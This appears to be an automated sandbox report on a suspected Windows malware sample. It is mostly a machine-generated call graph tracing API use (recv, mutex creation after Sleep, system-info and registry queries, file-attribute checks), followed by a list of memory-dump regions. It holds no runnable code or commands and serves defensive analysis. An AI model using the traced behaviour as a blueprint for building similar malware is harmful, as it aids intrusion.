12847->12848 12848->12834 12850 e87e09 __cftof 12849->12850 12854 e87def 12849->12854 12850->12834 12851 e87f69 12857 e87f77 12851->12857 12858 e87f8b 12851->12858 12876 e88241 12851->12876 12853 e87fa2 12853->12858 12872 e88390 12853->12872 12854->12850 12854->12851 12854->12853 12854->12857 12857->12858 12880 e886ea 12857->12880 12858->12834 12860 e87f69 12859->12860 12861 e87f4f 12859->12861 12862 e88241 4 API calls 12860->12862 12866 e87f77 12860->12866 12867 e87f8b 12860->12867 12861->12860 12863 e87fa2 12861->12863 12861->12866 12862->12866 12864 e88390 4 API calls 12863->12864 12863->12867 12864->12866 12865 e886ea 4 API calls 12865->12867 12866->12865 12866->12867 12867->12834 12869 e87b62 12868->12869 12870 e88ab6 4 API calls 12869->12870 12871 e87b85 12870->12871 12871->12843 12873 e883ab 12872->12873 12874 e883dd 12873->12874 12884 e8c88e 12873->12884 12874->12857 12877 e8825a 12876->12877 12891 e8d3c8 12877->12891 12879 e8830d 12879->12857 12879->12879 12881 e8875d __floor_pentium4 12880->12881 12883 e88707 12880->12883 12881->12858 12882 e8c88e __cftof 4 API calls 12882->12883 12883->12881 12883->12882 12887 e8c733 12884->12887 12886 e8c8a6 12886->12874 12888 e8c743 12887->12888 12889 e8690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12888->12889 12890 e8c748 __cftof 12888->12890 12889->12890 12890->12886 12894 e8d3ee 12891->12894 12903 e8d3d8 __cftof 12891->12903 12892 e8d485 12896 e8d4ae 12892->12896 12897 e8d4e4 12892->12897 12893 e8d48a 12904 e8cbdf 12893->12904 12894->12892 12894->12893 12894->12903 12898 e8d4cc 12896->12898 12899 e8d4b3 12896->12899 12921 e8cef8 12897->12921 12917 e8d0e2 12898->12917 12910 e8d23e 12899->12910 12903->12879 12905 e8cbf1 12904->12905 12906 e8690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12905->12906 12907 e8cc05 12906->12907 12908 e8cef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 12907->12908 12909 e8cc0d __alldvrm __cftof _strrchr 12907->12909 12908->12909 12909->12903 12912 e8d26c 12910->12912 12911 e8d2de 12913 e8cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 12911->12913 12912->12911 12914 e8d2a5 12912->12914 12915 e8d2b7 12912->12915 12913->12914 12914->12903 12915->12915 12916 e8d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 12915->12916 12916->12914 12918 e8d10f 12917->12918 12919 e8d14e 12918->12919 12920 e8d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 12918->12920 12919->12903 12920->12919 12922 e8cf10 12921->12922 12923 e8cf75 12922->12923 12924 e8cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 12922->12924 12923->12903 12924->12923 12563 e5a9f4 12574 e59230 12563->12574 12565 e5aa03 shared_ptr 12566 e55c10 6 API calls 12565->12566 12573 e5aab3 shared_ptr 12565->12573 12567 e5aa65 12566->12567 12568 e55c10 6 API calls 12567->12568 12569 e5aa8d 12568->12569 12570 e55c10 6 API calls 12569->12570 12570->12573 12571 e5ad3c shared_ptr __floor_pentium4 12573->12571 12584 e88ab6 12573->12584 12577 e59284 shared_ptr 12574->12577 12575 e55c10 6 API calls 12575->12577 12576 e59543 shared_ptr __floor_pentium4 12576->12565 12577->12575 12582 e5944f shared_ptr 12577->12582 12578 e55c10 6 API calls 12578->12582 12579 e598b5 shared_ptr __floor_pentium4 12579->12565 12580 e5979f shared_ptr 12580->12579 12581 e55c10 6 API calls 12580->12581 12583 e59927 shared_ptr __floor_pentium4 12581->12583 12582->12576 12582->12578 12582->12580 12583->12565 12585 e88ad1 12584->12585 12586 e88868 4 API calls 12585->12586 12587 e88adb 12586->12587 12587->12573 12460 e54276 12461 e52410 5 API calls 12460->12461 12462 e5427f 12461->12462 12343 e542b0 12346 e53ac0 12343->12346 12345 e542bb shared_ptr 12347 e53af9 12346->12347 12350 e53b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 12347->12350 12351 e53c38 12347->12351 12356 e532d0 12347->12356 12348 e532d0 6 API calls 12353 e53c5f 12348->12353 12350->12345 12351->12348 12351->12353 12352 e53c68 12352->12345 12353->12352 12373 e53810 12353->12373 12357 e6c6ac GetSystemTimePreciseAsFileTime 12356->12357 12359 e53314 12357->12359 12358 e6c26a 5 API calls 12360 e5333c __Mtx_unlock 12358->12360 12359->12358 12359->12360 12361 e6c26a 5 API calls 12360->12361 12362 e53350 __floor_pentium4 12360->12362 12363 e53377 12361->12363 12362->12351 12364 e6c6ac GetSystemTimePreciseAsFileTime 12363->12364 12365 e533af 12364->12365 12366 e6c26a 5 API calls 12365->12366 12367 e533b6 12365->12367 12366->12367 12368 e6c26a 5 API calls 12367->12368 12369 e533d7 __Mtx_unlock 12367->12369 12368->12369 12370 e6c26a 5 API calls 12369->12370 12371 e533eb 12369->12371 12372 e5340e 12370->12372 12371->12351 12372->12351 12374 e5381c 12373->12374 12377 e52440 12374->12377 12380 e6b5d6 12377->12380 12379 e52472 12381 e6b5f1 std::_Throw_future_error 12380->12381 12382 e88bec __cftof 4 API calls 12381->12382 12384 e6b658 __cftof __floor_pentium4 12381->12384 12383 e6b69f 12382->12383 12384->12379 12680 e577b0 12681 e577f1 shared_ptr 12680->12681 12682 e55c10 6 API calls 12681->12682 12685 e57883 shared_ptr 12681->12685 12682->12685 12683 e55c10 6 API calls 12684 e579e3 12683->12684 12687 e55c10 6 API calls 12684->12687 12685->12683 12686 e57953 shared_ptr __floor_pentium4 12685->12686 12688 e57a15 shared_ptr 12687->12688 12689 e55c10 6 API calls 12688->12689 12694 e57aa5 shared_ptr __floor_pentium4 12688->12694 12690 e57b7d 12689->12690 12691 e55c10 6 API calls 12690->12691 12692 e57ba0 12691->12692 12693 e55c10 6 API calls 12692->12693 12693->12694 12695 e587b0 12696 e587b6 12695->12696 12697 e587b8 GetFileAttributesA 12695->12697 12696->12697 12698 e587c4 12697->12698 12762 e52170 12765 e6c6fc 12762->12765 12764 e5217a 12766 e6c70c 12765->12766 12768 e6c724 12765->12768 12766->12768 12769 e6cfbe 12766->12769 12768->12764 12770 e6ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12769->12770 12771 e6cfd0 12770->12771 12771->12766 12928 e58d30 12929 e58d80 12928->12929 12930 e55c10 6 API calls 12929->12930 12931 e58d9a shared_ptr __floor_pentium4 12930->12931 12699 e647b0 12701 e64eed 12699->12701 12700 e64f59 shared_ptr __floor_pentium4 12701->12700 12702 e57d30 7 API calls 12701->12702 12703 e650ed 12702->12703 12738 e58380 12703->12738 12705 e65106 12706 e55c10 6 API calls 12705->12706 12707 e65155 12706->12707 12708 e55c10 6 API calls 12707->12708 12709 e65171 12708->12709 12744 e59a00 12709->12744 12739 e583e5 __cftof 12738->12739 12740 e55c10 6 API calls 12739->12740 12741 e58403 shared_ptr __floor_pentium4 12739->12741 12742 e58427 12740->12742 12741->12705 12743 e55c10 6 API calls 12742->12743 12743->12741 12745 e59a3f 12744->12745 12746 e55c10 6 API calls 12745->12746 12747 e59a47 12746->12747 12748 e58b30 6 API calls 12747->12748 12749 e59a58 12748->12749 12238 e587b2 12239 e587b6 12238->12239 12240 e587b8 GetFileAttributesA 12238->12240 12239->12240 12241 e587c4 12240->12241 12389 e59ab8 12391 e59acc 12389->12391 12392 e59b08 12391->12392 12393 e55c10 6 API calls 12392->12393 12394 e59b7c 12393->12394 12395 e58b30 6 API calls 12394->12395 12396 e59b8d 12395->12396 12397 e55c10 6 API calls 12396->12397 12398 e59cb1 12397->12398 12399 e58b30 6 API calls 12398->12399 12400 e59cc2 12399->12400 12246 e6d0c7 12247 e6d0d6 12246->12247 12248 e6d17f 12247->12248 12249 e6d17b RtlWakeAllConditionVariable 12247->12249 12772 e59f44 12773 e59f4c shared_ptr 12772->12773 12774 e5a953 Sleep CreateMutexA 12773->12774 12775 e5a01f shared_ptr 12773->12775 12776 e5a98e 12774->12776 12468 e53c47 12469 e53c51 12468->12469 12470 e532d0 6 API calls 12469->12470 12472 e53c5f 12469->12472 12470->12472 12471 e53c68 12472->12471 12473 e53810 4 API calls 12472->12473 12474 e53cdb 12473->12474 12183 e58780 12184 e58786 12183->12184 12190 e86729 12184->12190 12187 e587a6 12189 e587a0 12197 e86672 12190->12197 12192 e58793 12192->12187 12193 e867b7 12192->12193 12195 e867c3 __cftof 12193->12195 12194 e867cd __cftof 12194->12189 12195->12194 12209 e86740 12195->12209 12198 e8667e __cftof 12197->12198 12200 e86685 __cftof 12198->12200 12201 e8a8c3 12198->12201 12200->12192 12202 e8a8cf __cftof 12201->12202 12205 e8a967 12202->12205 12204 e8a8ea 12204->12200 12208 e8a98a 12205->12208 12206 e8d82f __cftof RtlAllocateHeap 12207 e8a9d0 __freea 12206->12207 12207->12204 12208->12206 12208->12207 12210 e86762 12209->12210 12212 e8674d __cftof __freea 12209->12212 12210->12212 12213 e8a038 12210->12213 12212->12194 12214 e8a075 12213->12214 12215 e8a050 12213->12215 12214->12212 12215->12214 12217 e90439 12215->12217 12218 e90445 __cftof 12217->12218 12220 e9044d __cftof __dosmaperr 12218->12220 12221 e9052b 12218->12221 12220->12214 12222 e9054d 12221->12222 12226 e90551 __cftof __dosmaperr 12221->12226 12222->12226 12227 e900d2 12222->12227 12226->12220 12228 e900e3 12227->12228 12229 e90106 12228->12229 12230 e8a671 __cftof 4 API calls 12228->12230 12229->12226 12231 e8fcc0 12229->12231 12230->12229 12232 e8fd0d 12231->12232 12233 e8690a __cftof 4 API calls 12232->12233 12234 e8fd1c __cftof 12233->12234 12235 e8b67d 4 API calls 12234->12235 12236 e8c719 GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 12234->12236 12237 e8ffbc __floor_pentium4 12234->12237 12235->12234 12236->12234 12237->12226 12250 e520c0 12253 e6c68b 12250->12253 12252 e520cc 12256 e6c3d5 12253->12256 12255 e6c69b 12255->12252 12257 e6c3e1 12256->12257 12258 e6c3eb 12256->12258 12259 e6c3be 12257->12259 12261 e6c39e 12257->12261 12258->12255 12269 e6cd0a 12259->12269 12261->12258 12265 e6ccd5 12261->12265 12262 e6c3d0 12262->12255 12266 e6cce3 InitializeCriticalSectionEx 12265->12266 12267 e6c3b7 12265->12267 12266->12267 12267->12255 12270 e6cd1f RtlInitializeConditionVariable 12269->12270 12270->12262 12271 e5e0c0 recv 12272 e5e122 recv 12271->12272 12273 e5e157 recv 12272->12273 12274 e5e191 12273->12274 12276 e5e2b3 __floor_pentium4 12274->12276 12280 e6c6ac 12274->12280 12287 e6c452 12280->12287 12282 e5e2ee 12283 e6c26a 12282->12283 12284 e6c292 12283->12284 12285 e6c274 12283->12285 12284->12284 12285->12284 12304 e6c297 12285->12304 12288 e6c4a8 12287->12288 12290 e6c47a __floor_pentium4 12287->12290 12288->12290 12293 e6cf6b 12288->12293 12290->12282 12291 e6c4fd __Xtime_diff_to_millis2 12291->12290 12292 e6cf6b _xtime_get GetSystemTimePreciseAsFileTime 12291->12292 12292->12291 12294 e6cf7a 12293->12294 12296 e6cf87 __aulldvrm 12293->12296 12294->12296 12297 e6cf44 12294->12297 12296->12291 12300 e6cbea 12297->12300 12301 e6cc07 12300->12301 12302 e6cbfb GetSystemTimePreciseAsFileTime 12300->12302 12301->12296 12302->12301 12307 e52ae0 12304->12307 12306 e6c2ae std::_Throw_future_error 12315 e6bedf 12307->12315 12309 e52aff 12309->12306 12310 e52af4 __cftof 12310->12309 12311 e8a671 __cftof 4 API calls 12310->12311 12314 e86ccc 12311->12314 12312 e88bec __cftof 4 API calls 12313 e86cf6 12312->12313 12314->12312 12318 e6cc31 12315->12318 12319 e6cc3f InitOnceExecuteOnce 12318->12319 12321 e6bef2 12318->12321 12319->12321 12321->12310 12483 e52e00 12484 e52e28 12483->12484 12485 e6c68b __Mtx_init_in_situ 2 API calls 12484->12485 12486 e52e33 12485->12486 12750 e58980 12752 e58aea 12750->12752 12753 e589d8 shared_ptr 12750->12753 12751 e55c10 6 API calls 12751->12753 12753->12751 12753->12752 12406 e53c8e 12407 e53c98 12406->12407 12409 e53ca5 12407->12409 12414 e52410 12407->12414 12410 e53ccf 12409->12410 12411 e53810 4 API calls 12409->12411 12412 e53810 4 API calls 12410->12412 12411->12410 12413 e53cdb 12412->12413 12415 e52424 12414->12415 12418 e6b52d 12415->12418 12426 e83aed 12418->12426 12420 e6b5a5 ___std_exception_copy 12433 e6b1ad 12420->12433 12422 e6b598 12429 e6af56 12422->12429 12425 e5242a 12425->12409 12437 e84f29 12426->12437 12428 e6b555 12428->12420 12428->12422 12428->12425 12430 e6af9f ___std_exception_copy 12429->12430 12432 e6afb2 shared_ptr 12430->12432 12443 e6b39f 12430->12443 12432->12425 12434 e6b1d8 12433->12434 12436 e6b1e1 shared_ptr 12433->12436 12435 e6b39f 5 API calls 12434->12435 12435->12436 12436->12425 12438 e84f2e __cftof 12437->12438 12438->12428 12439 e8d634 __cftof 4 API calls 12438->12439 12442 e88bfc __cftof 12438->12442 12439->12442 12440 e865ed __cftof 3 API calls 12441 e88c2f 12440->12441 12442->12440 12444 e6bedf InitOnceExecuteOnce 12443->12444 12445 e6b3e1 12444->12445 12446 e6b3e8 12445->12446 12454 e86cbb 12445->12454 12446->12432 12455 e86cc7 __cftof 12454->12455 12456 e8a671 __cftof 4 API calls 12455->12456 12459 e86ccc 12456->12459 12457 e88bec __cftof 4 API calls 12458 e86cf6 12457->12458 12459->12457 12475 e86a44 12476 e86a5c 12475->12476 12477 e86a52 12475->12477 12480 e8698d 12476->12480 12479 e86a76 __freea 12481 e8690a __cftof 4 API calls 12480->12481 12482 e8699f 12481->12482 12482->12479 11984 e5a856 11985 e5a870 11984->11985 11986 e5a892 shared_ptr 11984->11986 11985->11986 11988 e5a94e 11985->11988 11991 e5a8a0 11986->11991 12000 e57d30 11986->12000 11990 e5a953 Sleep CreateMutexA 11988->11990 11989 e5a8ae 11989->11991 11992 e57d30 7 API calls 11989->11992 11993 e5a98e 11990->11993 11994 e5a8b8 11992->11994 11994->11991 11995 e57d30 7 API calls 11994->11995 11996 e5a8c2 11995->11996 11996->11991 11997 e57d30 7 API calls 11996->11997 11998 e5a8cc 11997->11998 11998->11991 11999 e57d30 7 API calls 11998->11999 11999->11991 12001 e57d96 __cftof 12000->12001 12038 e57ee8 shared_ptr __floor_pentium4 12001->12038 12039 e55c10 12001->12039 12003 e57dd2 12004 e55c10 6 API calls 12003->12004 12006 e57dff shared_ptr 12004->12006 12005 e57ed3 GetNativeSystemInfo 12007 e57ed7 12005->12007 12006->12005 12006->12007 12006->12038 12008 e57f3f 12007->12008 12009 e58019 12007->12009 12007->12038 12011 e55c10 6 API calls 12008->12011 12010 e55c10 6 API calls 12009->12010 12013 e5804c 12010->12013 12012 e57f67 12011->12012 12014 e55c10 6 API calls 12012->12014 12015 e55c10 6 API calls 12013->12015 12016 e57f86 12014->12016 12017 e5806b 12015->12017 12049 e88bbe 12016->12049 12019 e55c10 6 API calls 12017->12019 12020 e580a3 12019->12020 12021 e55c10 6 API calls 12020->12021 12022 e580f4 12021->12022 12023 e55c10 6 API calls 12022->12023 12024 e58113 12023->12024 12025 e55c10 6 API calls 12024->12025 12026 e5814b 12025->12026 12027 e55c10 6 API calls 12026->12027 12028 e5819c 12027->12028 12029 e55c10 6 API calls 12028->12029 12030 e581bb 12029->12030 12031 e55c10 6 API calls 12030->12031 12032 e581f3 12031->12032 12033 e55c10 6 API calls 12032->12033 12034 e58244 12033->12034 12035 e55c10 6 API calls 12034->12035 12036 e58263 12035->12036 12037 e55c10 6 API calls 12036->12037 12037->12038 12038->11989 12040 e55c54 12039->12040 12052 e54b30 12040->12052 12042 e55d17 shared_ptr __floor_pentium4 12042->12003 12043 e55c7b __cftof 12043->12042 12044 e55da7 RegOpenKeyExA 12043->12044 12045 e55e00 RegCloseKey 12044->12045 12047 e55e26 12045->12047 12046 e55ea6 shared_ptr __floor_pentium4 12046->12003 12047->12046 12048 e55c10 4 API calls 12047->12048 12173 e88868 12049->12173 12051 e88bdc 12051->12038 12054 e54ce5 12052->12054 12055 e54b92 12052->12055 12054->12043 12055->12054 12056 e86da6 12055->12056 12057 e86dc2 __fassign 12056->12057 12058 e86db4 12056->12058 12057->12055 12061 e86d19 12058->12061 12066 e8690a 12061->12066 12065 e86d3d 12065->12055 12067 e86921 12066->12067 12068 e8692a 12066->12068 12074 e86d52 12067->12074 12068->12067 12080 e8a671 12068->12080 12075 e86d8f 12074->12075 12076 e86d5f 12074->12076 12165 e8b67d 12075->12165 12078 e86d6e __fassign 12076->12078 12160 e8b6a1 12076->12160 12078->12065 12081 e8a67b __cftof 12080->12081 12082 e8a694 __cftof __freea 12081->12082 12095 e8d82f 12081->12095 12084 e8694a 12082->12084 12099 e88bec 12082->12099 12087 e8b5fb 12084->12087 12088 e8b60e 12087->12088 12089 e86960 12087->12089 12088->12089 12125 e8f5ab 12088->12125 12091 e8b628 12089->12091 12092 e8b650 12091->12092 12093 e8b63b 12091->12093 12092->12067 12093->12092 12132 e8e6b1 12093->12132 12098 e8d83c __cftof 12095->12098 12096 e8d867 RtlAllocateHeap 12097 e8d87a 12096->12097 12096->12098 12097->12082 12098->12096 12098->12097 12100 e88bf1 __cftof 12099->12100 12103 e88bfc __cftof 12100->12103 12105 e8d634 12100->12105 12119 e865ed 12103->12119 12107 e8d640 __cftof 12105->12107 12106 e8d69c __cftof 12106->12103 12107->12106 12108 e8d81b __cftof 12107->12108 12109 e8d726 12107->12109 12111 e8d751 __cftof 12107->12111 12110 e865ed __cftof 3 API calls 12108->12110 12109->12111 12122 e8d62b 12109->12122 12112 e8d82e 12110->12112 12111->12106 12114 e8a671 __cftof 4 API calls 12111->12114 12117 e8d7a5 12111->12117 12114->12117 12116 e8d62b __cftof 4 API calls 12116->12111 12117->12106 12118 e8a671 __cftof 4 API calls 12117->12118 12118->12106 12120 e864c7 __cftof 3 API calls 12119->12120 12121 e865fe 12120->12121 12123 e8a671 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12122->12123 12124 e8d630 12123->12124 12124->12116 12126 e8f5b7 __cftof 12125->12126 12127 e8a671 __cftof 4 API calls 12126->12127 12129 e8f5c0 __cftof 12127->12129 12128 e8f606 12128->12089 12129->12128 12130 e88bec __cftof 4 API calls 12129->12130 12131 e8f62b 12130->12131 12133 e8a671 __cftof 4 API calls 12132->12133 12134 e8e6bb 12133->12134 12137 e8e5c9 12134->12137 12136 e8e6c1 12136->12092 12140 e8e5d5 __cftof __freea 12137->12140 12138 e8e5f6 12138->12136 12139 e88bec __cftof 4 API calls 12141 e8e668 12139->12141 12140->12138 12140->12139 12142 e8e6a4 12141->12142 12146 e8a72e 12141->12146 12142->12136 12147 e8a739 __cftof 12146->12147 12148 e8d82f __cftof RtlAllocateHeap 12147->12148 12152 e8a745 __cftof __freea 12147->12152 12148->12152 12149 e88bec __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12150 e8a7c7 12149->12150 12151 e8a7be 12153 e8e4b0 12151->12153 12152->12149 12152->12151 12154 e8e5c9 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12153->12154 12155 e8e4c3 12154->12155 12156 e8e259 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12155->12156 12157 e8e4cb __cftof 12156->12157 12158 e8e6c4 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12157->12158 12159 e8e4dc __cftof __freea 12157->12159 12158->12159 12159->12142 12161 e8690a __cftof 4 API calls 12160->12161 12162 e8b6be 12161->12162 12164 e8b6ce __floor_pentium4 12162->12164 12170 e8f1bf 12162->12170 12164->12078 12166 e8a671 __cftof 4 API calls 12165->12166 12167 e8b688 12166->12167 12168 e8b5fb __cftof 4 API calls 12167->12168 12169 e8b698 12168->12169 12169->12078 12171 e8690a __cftof 4 API calls 12170->12171 12172 e8f1df __cftof __fassign __freea __floor_pentium4 12171->12172 12172->12164 12174 e8887a 12173->12174 12175 e8888f __cftof 12174->12175 12176 e8690a __cftof 4 API calls 12174->12176 12175->12051 12178 e888bf 12176->12178 12177 e86d52 4 API calls 12177->12178 12178->12175 12178->12177 12754 e52b90 12755 e52bce 12754->12755 12756 e6b7fb TpReleaseWork 12755->12756 12757 e52bdb shared_ptr __floor_pentium4 12756->12757 12932 e52b10 12933 e52b1c 12932->12933 12934 e52b1a 12932->12934 12935 e6c26a 5 API calls 12933->12935 12936 e52b22 12935->12936 12588 e687d0 12589 e6882a __cftof 12588->12589 12595 e69bb0 12589->12595 12593 e688d9 std::_Throw_future_error 12594 e6886c __floor_pentium4 12608 e69ef0 12595->12608 12597 e69be5 12598 e52ce0 5 API calls 12597->12598 12599 e69c16 12598->12599 12612 e69f70 12599->12612 12601 e68854 12601->12594 12602 e543f0 12601->12602 12603 e6bedf InitOnceExecuteOnce 12602->12603 12605 e5440a 12603->12605 12604 e54411 12604->12593 12605->12604 12606 e86cbb 4 API calls 12605->12606 12607 e54424 12606->12607 12609 e69f0c 12608->12609 12610 e6c68b __Mtx_init_in_situ 2 API calls 12609->12610 12611 e69f17 12610->12611 12611->12597 12613 e69fef shared_ptr 12612->12613 12615 e6a058 12613->12615 12617 e6a210 12613->12617 12616 e6a03b 12616->12601 12618 e6a290 12617->12618 12624 e671d0 12618->12624 12620 e6a2cc shared_ptr 12621 e6a4be shared_ptr 12620->12621 12622 e53ee0 3 API calls 12620->12622 12621->12616 12623 e6a4a6 12622->12623 12623->12616 12625 e67211 12624->12625 12632 e53970 12625->12632 12627 e67446 __floor_pentium4 12627->12620 12628 e672ad __cftof 12628->12627 12629 e6c68b __Mtx_init_in_situ 2 API calls 12628->12629 12630 e67401 12629->12630 12637 e52ec0 12630->12637 12633 e6c68b __Mtx_init_in_situ 2 API calls 12632->12633 12634 e539a7 12633->12634 12635 e6c68b __Mtx_init_in_situ 2 API calls 12634->12635 12636 e539e6 12635->12636 12636->12628 12638 e52f06 12637->12638 12643 e52f6f 12637->12643 12639 e6c6ac GetSystemTimePreciseAsFileTime 12638->12639 12640 e52f12 12639->12640 12641 e5301e 12640->12641 12645 e52f1d __Mtx_unlock 12640->12645 12642 e6c26a 5 API calls 12641->12642 12644 e53024 12642->12644 12647 e6c6ac GetSystemTimePreciseAsFileTime 12643->12647 12656 e52fef 12643->12656 12646 e6c26a 5 API calls 12644->12646 12645->12643 12645->12644 12648 e52fb9 12646->12648 12647->12648 12649 e6c26a 5 API calls 12648->12649 12650 e52fc0 __Mtx_unlock 12648->12650 12649->12650 12651 e6c26a 5 API calls 12650->12651 12652 e52fd8 12650->12652 12651->12652 12653 e6c26a 5 API calls 12652->12653 12652->12656 12654 e5303c 12653->12654 12655 e6c6ac GetSystemTimePreciseAsFileTime 12654->12655 12665 e53080 shared_ptr __Mtx_unlock 12655->12665 12656->12627 12657 e6c26a 5 API calls 12658 e531cb 12657->12658 12659 e6c26a 5 API calls 12658->12659 12660 e531d1 12659->12660 12661 e6c26a 5 API calls 12660->12661 12667 e53193 __Mtx_unlock 12661->12667 12662 e531a7 __floor_pentium4 12662->12627 12663 e6c26a 5 API calls 12664 e531dd 12663->12664 12665->12658 12665->12662 12666 e6c6ac GetSystemTimePreciseAsFileTime 12665->12666 12668 e5315f 12665->12668 12666->12668 12667->12662 12667->12663 12668->12657 12668->12660 12668->12667 12937 e6d111 12938 e6d122 12937->12938 12939 e6d12a 12938->12939 12941 e6d199 12938->12941 12942 e6d1a7 SleepConditionVariableCS 12941->12942 12944 e6d1c0 12941->12944 12942->12944 12944->12938 12322 e59adc 12323 e59aea 12322->12323 12327 e59afe shared_ptr 12322->12327 12324 e5a917 12323->12324 12323->12327 12325 e5a953 Sleep CreateMutexA 12324->12325 12326 e5a98e 12325->12326 12328 e55c10 6 API calls 12327->12328 12329 e59b7c 12328->12329 12336 e58b30 12329->12336 12331 e59b8d 12332 e55c10 6 API calls 12331->12332 12333 e59cb1 12332->12333 12334 e58b30 6 API calls 12333->12334 12335 e59cc2 12334->12335 12337 e58b7c 12336->12337 12338 e55c10 6 API calls 12337->12338 12339 e58b97 shared_ptr __floor_pentium4 12338->12339 12339->12331 12758 e53f9f 12759 e53fb6 12758->12759 12760 e53fad 12758->12760 12761 e52410 5 API calls 12760->12761 12761->12759 12787 e5215a 12788 e6c6fc InitializeCriticalSectionEx 12787->12788 12789 e52164 12788->12789

                                                                                                                                              Executed Functions

                                                                                                                                              Function 00E8652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(?,?,00E8652A,?,?,?,?,?,00E87661), ref: 00E86567
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1716538378.0000000000E50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716556204.0000000000EB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716763609.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716834012.0000000000EBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716855532.0000000000EC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716873008.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1716940538.0000000000EC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717449514.0000000001020000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717571841.0000000001022000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1717729101.0000000001030000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718123012.0000000001031000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718322960.000000000103C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1718526093.0000000001040000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719275382.0000000001041000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719299270.0000000001042000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719318091.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719460485.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719476233.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719501305.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719754002.0000000001058000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719863677.000000000106E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719918303.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720025951.0000000001077000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720052328.0000000001080000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720079903.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720099065.00000000010AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720115148.00000000010AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720130839.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720150882.00000000010B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720166422.00000000010BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720188381.00000000010C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720203701.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720219976.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720235908.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720250464.00000000010D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720265532.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
